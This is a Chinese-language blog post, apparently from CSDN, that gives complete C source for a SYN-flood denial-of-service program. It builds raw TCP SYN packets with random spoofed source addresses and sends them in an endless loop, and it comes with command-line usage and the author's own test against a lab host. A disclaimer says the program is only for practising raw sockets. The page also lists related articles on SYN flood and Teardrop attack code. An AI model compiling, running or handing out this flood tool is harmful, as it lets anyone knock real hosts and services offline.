Linux拓展应用之原始套接字实现DOS攻击

最新推荐文章于 2022-10-19 00:33:11 发布
最新推荐文章于 2022-10-19 00:33:11 发布
阅读量523 收藏 2
点赞数 1
文章标签: DOS攻击 原始套接字
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Chiang2018/article/details/82470135
版权

在这里插入图片描述

以下代码实现了使用原始套接字进行DOS攻击的程序,主要用于联系原始套接字的使用,读者切勿使用该程序,去攻击任何主机。
DOS攻击的实现原理是,使用程序,有意去破坏TCP的三次握手,并不断向目标主机发送一个基于TCP的数据包,且该数据包是SYN类型,数据包中的源IP地址为一个随机IP地址,这将导致目标主机收到SYN包之后,一直无法完成3次握手,从而导致系统资源的浪费。
源码如下:

#include <errno.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdio.h>

 unsigned short check_sum(unsigned short* addr,int len)
 {
	 register int nleft =len;
	 register int sum = 0;
	 register short *w=addr;
	 short answer = 0;
	 while(nleft>1)
	 {
		 sum+=*w++;
		 nleft-=2;
	 }
	 
	 if(nleft == 1)
	 {
		 *(unsigned char*)(&answer)=*(unsigned char*)w;
		 sum+=answer;
	 }
	 
	 sum = (sum>>16)+(sum&0xffff);
	 sum+=(sum>>16);
	 answer = ~sum;
	 return answer;
	 
 }
void send_data(int sockfd,struct sockaddr_in * addr,int port)
{
	char buf[1024];
	struct iphdr* ip;
	struct tcphdr* tcp;
	int head_len;
	
	head_len = sizeof(struct iphdr)+sizeof(struct tcphdr);  /*SYN包不包含用户数据,即获取整个数据包长度*/
	memset(buf,0,sizeof(buf));
	
	ip = (struct iphdr*)buf;
	ip->version = IPVERSION;              /*IP版本*/                 
	ip->ihl = sizeof(struct ip)>>2;       /*IP包头长度*/
	ip->tos=0;                            /*服务类型*/
	ip->tot_len = htons(head_len);        /*IP数据包长度*/
	ip->id =0;                            
	ip->frag_off = 0;       
	ip->ttl = MAXTTL;                     /*TTL时间*/
	ip->protocol = IPPROTO_TCP;           /*协议为TCP*/
	ip->check = 0;                        /*检验和,后面赋值*/
	ip->daddr = addr->sin_addr.s_addr;    /*目标主机IP*/
	
	tcp = (struct tcphdr*)(buf+sizeof(struct ip));
	tcp->source = htons(port);            /*本地发送端端口*/  
	tcp->dest = addr->sin_port;			  /*目标主机端口*/  
	tcp->seq= random();                   /*随机的序列号,打破三次捂手*/  
	tcp->ack_seq = 0;                     /*不回应ack*/ 
	tcp->doff = 5;			
	tcp->syn=1;							   /*数据类型为SYN请求*/ 				
	while(1)
	{
		ip->saddr = random();              /*计算校验和*/
		tcp->check = check_sum((unsigned short*)tcp,sizeof(struct tcphdr));
		sendto(sockfd,buf,head_len,0,(struct sockaddr*)addr,(socklen_t)sizeof(struct sockaddr_in));
	
	}
	
}

/*
程序运行需要传入3个参数,分别为目标主机的IP地址或域名,目标主机的端口号,本机发送端端口号
例如:./a.out 192.168.103.108  8000  8888
*/
int main(int argc,char* argv[])
{
	int sockfd = 0;
	int port = 0;
	struct sockaddr_in addr;
	struct hostent* host;
	int on = 1;
	if(argc != 4)
	{
		printf("input err!ag:./a.out 192.168.103.108  8000  8888\n");
		exit(1);
	}
	
	memset(&addr,0,sizeof(struct sockaddr_in));
	
	addr.sin_family = AF_INET;                      /*IPV4协议*/
	if(inet_aton(argv[1],&addr.sin_addr) == 0)      /*获取IP地址的主机名,攻击使用第一个IP*/
	{
		host = gethostbyname(argv[1]);
		if(NULL == host)
		{
			printf("gethostbyname fail!\n");
			exit(1);
		}
		addr.sin_addr = *(struct in_addr*)(host->h_addr_list[0]);
	}
	
	port = atoi(argv[2]);
	addr.sin_port = htons(port);
	sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP);   /*创建基于TCP的原始套接字*/
	if(sockfd < 0)
	{
		printf("socker fail!\n");
		return -1;
	}
	
	setsockopt(sockfd,IPPROTO_TCP,IP_HDRINCL,&on,sizeof(on));/*设置套接字的属性为自己构建IP头*/
	
	port = atoi(argv[3]);
	send_data(sockfd,&addr,port);                            /*发送SYN包*/
	
	
	return 0;
}

若想验证结果,可使用 Wireshark进行抓包即可!我是使用虚拟机(192.168.103.128)攻击主机(192.168.103.108)的,从图中可以看到,主机收到了很多SYN包。

这里写图片描述
在这里插入图片描述

Chiang木
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ip dontfrag linux,c – 如何在套接字上设置do not fragment(DF)标志?
weixin_39642619的博客
05-08 782
我试图设置使用UDP发送数据包的DF(不分段标志).看看Richard Steven的书第1卷Unix网络编程;套接字网络API,我无法找到如何设置它.我怀疑我会用setsockopt()来做,但是在第193页的表格中找不到它.请建议如何做到这一点.解决方法:你可以通过使用IP_DONTFRAG选项调用setsockopt()来实现::int val = 1;setsockopt(sd, IPPR...
网络编程学习——套接字选项
weixin_33797791的博客
04-15 356
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux原始套接字实现分析---转
12-07 1209
http://blog.chinaunix.net/uid-27074062-id-3388166.html 本文从IPV4协议栈原始套接字的分类入手,详细介绍了链路层和网络层原始套接字的特点及其内核实现细节。并结合原始套接字的实际应用,说明各类型原始套接字的适应范围,以及在实际使用时需要注意的问题。 一、原始套接字概述 协议栈的原始套接字实现...
Linux网络编程: 原始套接字
mmdev
04-15 148
原始套接字(SOCK_RAW). 应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能. 注意原始套接字只能够由有 root权限的人创建. /******************** DOS.c *****************/ #include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; #inclu...
原始套接字 发送 TCP SYN 包
nia305的博客
07-13 8649
通过原始套接字、setsockopt、IP_HDRINCL套接字选项,我们可以在应用进程里面构造自己的IP包:所以我们在初始化原始套接字之后,可以调用setsockopt函数来开启IP_HDRINCL套接字选项,并且构造自己的IP头,TCP/UDP头,最后再像发送普通包一样调用sendto 、sendmsg等函数发送构造好的数据。1.首先我们可以先得到一个原始套接字,并且设置IP_HDRINCL套...
Linux网络编程原始套接字编程及实例分析.docx
最新发布
11-29
Linux 网络编程 - 原始套接字编程及实例分析 一、原始套接字概述 原始套接字(SOCK_RAW)是一种特殊的套接字类型,它允许开发者在 Linux 系统中访问和控制网络协议栈的底层细节。原始套接字可以用来发送自定义的 ...
linux_sock_raw.rar_RAW_linux sock raw_原始套接字
09-20
3. **网络攻击检测**:通过监控网络流量,原始套接字可以帮助检测并防止DoS攻击或其他恶意行为。 七、注意事项 1. **错误处理**:编程过程中,必须充分考虑错误处理,比如套接字创建失败、发送/接收错误、权限问题...
原始套接字发送完整UDP数据包(c语言实现
06-01
使用C语言实现原始套接字从数据链路层到应用层的操作,Linux系统
udp.rar_linux_socket_udp服务端编写_原始套接字udp
09-24
综上所述,这个项目涵盖了UDP套接字编程原始套接字使用以及ICMP回射请求的实现,是学习和实践网络编程特别是无连接服务端和客户端通信的好例子。通过理解并运行这些代码,开发者能深入理解UDP通信和网络协议的...
linux 使用原始套接字捕捉包
01-26
linux 下的一个小软件,使用原始套接字实现所有的底层抓包分析,注意用root 权限运行
获取和设置套接字选项——getsockopt/setsockopt
xrfsycg的专栏
03-17 1851
函数原型: #include int getsockopt(int sockfd, int level, int optname, void *optval, socklen_t *optlen); int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
原始套接字
老毛的博客
07-11 3423
原始套接字的两个应用:ping和tracert
C语言实现基于SYN洪泛的DoS攻击
景向后山的博客
06-24 7896
这是一个C语言程序,C语言实现基于SYN洪泛的DoS攻击。其中,启动传入参数第一个是伪造源地址,第二个是目的地址,第三个是目的端口号。
原始套接字实现网络监听
编程爱好者
03-18 2050
 作者:张志强下载源代码 1、引言    网络监听工具(sinff)是提供给网络管理员的一类管理工具。在以太网中(Ethernet),当网络上连接多台计算机时,某瞬间只能有一台计算机可以传送数据。以太网中,数据是以被称为帧的数据结构为单位进行交换的。通常,在计算机网络上交换的数据结构体的单位是数据包。而在以太网中则称为帧。这种数据包是由记录着数据包发送给对方所必需信息的报头部分和记录着发送信息
原始套接字-SOCK_RAW
wkk的博客
10-19 6049
winsocket通信 原始套接字sock_raw ping程序实现
原始套接字简介
qq_37659294的博客
04-21 684
原始套接字概述 原始套接字,指在传输层下面使用套接字。流式套接字和数据报套接字这两种套接字工作在传输层,主要为应用层的应用程序提供服务,并且在接收和发送时只能操作数据部分,而不能对IP首部或TCP和UDP首部进行操作,通常把这两种套接字称为标准套接字。 但是,如果我们开发的是更底层的应用,比如发送一个自定义的IP包、UDP包、TCP包或ICMP包,捕获所有经过本机网卡的数据包,伪装本机的IP,想要操作IP首部或传输层协议首部,等等,这些功能对于这两种套接字就无能为力了。这些功能需要使用另一种套接..
Teardrop代码编程伪造一个虚假地址的IP包和SOCKET应用实例
zidingyidingyi的博客
12-05 704
Teardrop攻击是一种畸形报文攻击。原理是向攻击者发送的多个分片的IP包,由于操作系统会将分开的IP包重新组合,系统收到偏移量错误IP包然后组合,导致数据异常。 实验代码:为“网络编程技术”参考书上 “2.11 原始套接字编程”中的Teardrop代码编程。 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h&
基于原始套接字的网络嗅探器
01-09
网络嗅探器的核心是利用Windows或Linux系统中的原始套接字功能,这种套接字工作在传输层之下,允许开发者直接操作网络数据包的IP首部和传输层协议首部,从而实现对经过本地网卡的数据包进行实时监控和深入分析。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Chiang木

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值